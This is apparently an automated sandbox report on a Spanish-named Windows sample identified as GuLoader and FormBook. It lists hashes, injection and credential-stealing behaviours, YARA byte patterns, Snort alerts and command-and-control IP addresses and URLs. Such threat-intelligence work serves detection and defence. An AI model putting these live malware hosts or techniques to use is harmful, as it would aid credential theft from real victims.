Edit tour

Windows Analysis Report
cuenta iban-ES65.exe

Overview

General Information

Sample name:	cuenta iban-ES65.exe
Analysis ID:	1400264
MD5:	5879a124cd6d7bfbf0133e005f1bdebd
SHA1:	3f96bd536b078f321322e52c0a2aa53b2139664e
SHA256:	f6580f6a21a712e87c8d55662adf7d87df24253976085675014f246cccf8fdaf
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Yara detected FormBook

Yara detected GuLoader

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64native

cuenta iban-ES65.exe (PID: 3036 cmdline: C:\Users\user\Desktop\cuenta iban-ES65.exe MD5: 5879A124CD6D7BFBF0133E005F1BDEBD)

cuenta iban-ES65.exe (PID: 5520 cmdline: C:\Users\user\Desktop\cuenta iban-ES65.exe MD5: 5879A124CD6D7BFBF0133E005F1BDEBD)

XHYtgzYIOwxqJ.exe (PID: 1784 cmdline: "C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

rasautou.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\rasautou.exe MD5: DFDBEDC2ED47CBABC13CCC64E97868F3)

XHYtgzYIOwxqJ.exe (PID: 1424 cmdline: "C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5048 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x152ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3bfba:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x26019:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x152ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x23f3f6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x229455:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x23f3f6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x229455:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x152ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x152ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.13148143396.0000000007C51000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 10 entries

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 109.234.166.81

Timestamp:	02/28/24-15:47:24.168030
SID:	2855464
Source Port:	50265
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 91.195.240.19

Timestamp:	02/28/24-15:51:08.620886
SID:	2855464
Source Port:	50290
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 194.191.24.38

Timestamp:	02/28/24-15:46:09.173431
SID:	2855464
Source Port:	50245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 103.146.179.172

Timestamp:	02/28/24-15:47:15.087986
SID:	2855465
Source Port:	50263
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 103.146.179.172

Timestamp:	02/28/24-15:47:06.561791
SID:	2855464
Source Port:	50260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 82.180.172.14

Timestamp:	02/28/24-15:45:12.014874
SID:	2855464
Source Port:	50232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 198.54.117.242

Timestamp:	02/28/24-15:50:28.113737
SID:	2855464
Source Port:	50281
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 198.177.123.106

Timestamp:	02/28/24-15:45:38.820397
SID:	2855464
Source Port:	50240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 172.67.130.3

Timestamp:	02/28/24-15:50:01.236638
SID:	2855464
Source Port:	50272
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 103.146.179.172

Timestamp:	02/28/24-15:47:09.411895
SID:	2855464
Source Port:	50261
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 84.32.84.32

Timestamp:	02/28/24-15:46:26.784462
SID:	2855464
Source Port:	50250
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 82.180.172.14

Timestamp:	02/28/24-15:45:17.388811
SID:	2855465
Source Port:	50235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 198.54.117.242

Timestamp:	02/28/24-15:50:36.382797
SID:	2855465
Source Port:	50284
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 198.177.123.106

Timestamp:	02/28/24-15:50:45.345083
SID:	2855464
Source Port:	50286
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 198.54.117.242

Timestamp:	02/28/24-15:45:25.858243
SID:	2855464
Source Port:	50237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 172.67.130.3

Timestamp:	02/28/24-15:50:09.297665
SID:	2855465
Source Port:	50275
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 84.32.84.32

Timestamp:	02/28/24-15:46:23.938435
SID:	2855464
Source Port:	50249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 198.54.117.242

Timestamp:	02/28/24-15:50:30.859256
SID:	2855464
Source Port:	50282
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 82.180.172.14

Timestamp:	02/28/24-15:45:09.327283
SID:	2855464
Source Port:	50231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 62.149.128.45

Timestamp:	02/28/24-15:46:44.457202
SID:	2855465
Source Port:	50255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 109.234.166.81

Timestamp:	02/28/24-15:47:29.845065
SID:	2855465
Source Port:	50267
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 82.180.172.14

Timestamp:	02/28/24-15:50:22.712674
SID:	2855465
Source Port:	50280
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 198.54.117.242

Timestamp:	02/28/24-15:45:23.096947
SID:	2855464
Source Port:	50236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 82.180.172.14

Timestamp:	02/28/24-15:50:17.338767
SID:	2855464
Source Port:	50278
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 91.195.240.19

Timestamp:	02/28/24-15:46:53.641836
SID:	2855464
Source Port:	50257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 91.195.240.19

Timestamp:	02/28/24-15:51:05.030309
SID:	2855464
Source Port:	50289
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 198.177.123.106

Timestamp:	02/28/24-15:45:46.996646
SID:	2855465
Source Port:	50243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 62.149.128.45

Timestamp:	02/28/24-15:46:35.925522
SID:	2855464
Source Port:	50252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 198.54.117.242

Timestamp:	02/28/24-15:45:31.396166
SID:	2855465
Source Port:	50239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 172.67.130.3

Timestamp:	02/28/24-15:50:03.923707
SID:	2855464
Source Port:	50273
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 84.32.84.32

Timestamp:	02/28/24-15:46:29.642379
SID:	2855465
Source Port:	50251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 198.177.123.106

Timestamp:	02/28/24-15:50:50.810014
SID:	2855465
Source Port:	50288
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 194.191.24.38

Timestamp:	02/28/24-15:46:06.307989
SID:	2855464
Source Port:	50244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 82.180.172.14

Timestamp:	02/28/24-15:50:14.644783
SID:	2855464
Source Port:	50277
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 62.149.128.45

Timestamp:	02/28/24-15:46:38.772727
SID:	2855464
Source Port:	50253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 91.195.240.19

Timestamp:	02/28/24-15:46:50.812331
SID:	2855464
Source Port:	50256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 198.177.123.106

Timestamp:	02/28/24-15:50:42.624191
SID:	2855464
Source Port:	50285
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 84.32.84.32

Timestamp:	02/28/24-15:46:21.093451
SID:	2855464
Source Port:	50248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 172.67.130.3

Timestamp:	02/28/24-15:50:06.611884
SID:	2855464
Source Port:	50274
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 91.195.240.19

Timestamp:	02/28/24-15:46:59.299144
SID:	2855465
Source Port:	50259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 194.191.24.38

Timestamp:	02/28/24-15:46:14.855634
SID:	2855465
Source Port:	50247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 109.234.166.81

Timestamp:	02/28/24-15:47:21.322045
SID:	2855464
Source Port:	50264
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.11.20 - Destination IP: 172.67.130.3

Timestamp:	02/28/24-15:44:58.700957
SID:	2855465
Source Port:	50230
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 198.177.123.106

Timestamp:	02/28/24-15:45:41.540083
SID:	2855464
Source Port:	50241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.mvmusicfactory.org/v3ka/	Avira URL Cloud: Label: malware
Source: http://www.mvmusicfactory.org/v3ka/?nf8dPP8p=svB+aVl3D/Qs3yYpy+EYx4/lcj1+jj1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36HepX9QRc4Df86SJn8w=&L0=2tHtHNWXtBDdYR	Avira URL Cloud: Label: malware

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: cuenta iban-ES65.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.68.46:443 -> 192.168.11.20:50224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.188.225:443 -> 192.168.11.20:50225 version: TLS 1.2

Source: cuenta iban-ES65.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: cuenta iban-ES65.exe, 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13173653721.00000000373AB000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13177808681.0000000037559000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cuenta iban-ES65.exe, cuenta iban-ES65.exe, 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13173653721.00000000373AB000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13177808681.0000000037559000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 0_2_00406010 FindFirstFileA,FindClose,	0_2_00406010
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055AE
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_0327CDE0 FindFirstFileW,FindNextFileW,FindClose,	5_2_0327CDE0

Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then pop edi	5_2_03272EE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then xor eax, eax	5_2_0326AD60
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then pop edi	5_2_0326F409
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then pop edi	5_2_0326F448
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then pop edi	5_2_03272EC5
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then pop edi	5_2_03272EC5
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 4x nop then pop edi	5_2_03272EDF

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50230 -> 172.67.130.3:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50231 -> 82.180.172.14:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50232 -> 82.180.172.14:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50235 -> 82.180.172.14:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50236 -> 198.54.117.242:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50237 -> 198.54.117.242:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50239 -> 198.54.117.242:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50240 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50241 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50243 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50244 -> 194.191.24.38:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50245 -> 194.191.24.38:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50247 -> 194.191.24.38:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50248 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50249 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50251 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50252 -> 62.149.128.45:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50253 -> 62.149.128.45:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50255 -> 62.149.128.45:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50256 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50257 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50259 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50260 -> 103.146.179.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50261 -> 103.146.179.172:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50263 -> 103.146.179.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50264 -> 109.234.166.81:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50265 -> 109.234.166.81:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50267 -> 109.234.166.81:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50250 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50272 -> 172.67.130.3:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50273 -> 172.67.130.3:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50274 -> 172.67.130.3:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50275 -> 172.67.130.3:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50277 -> 82.180.172.14:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50278 -> 82.180.172.14:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50280 -> 82.180.172.14:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50281 -> 198.54.117.242:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50282 -> 198.54.117.242:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50284 -> 198.54.117.242:80
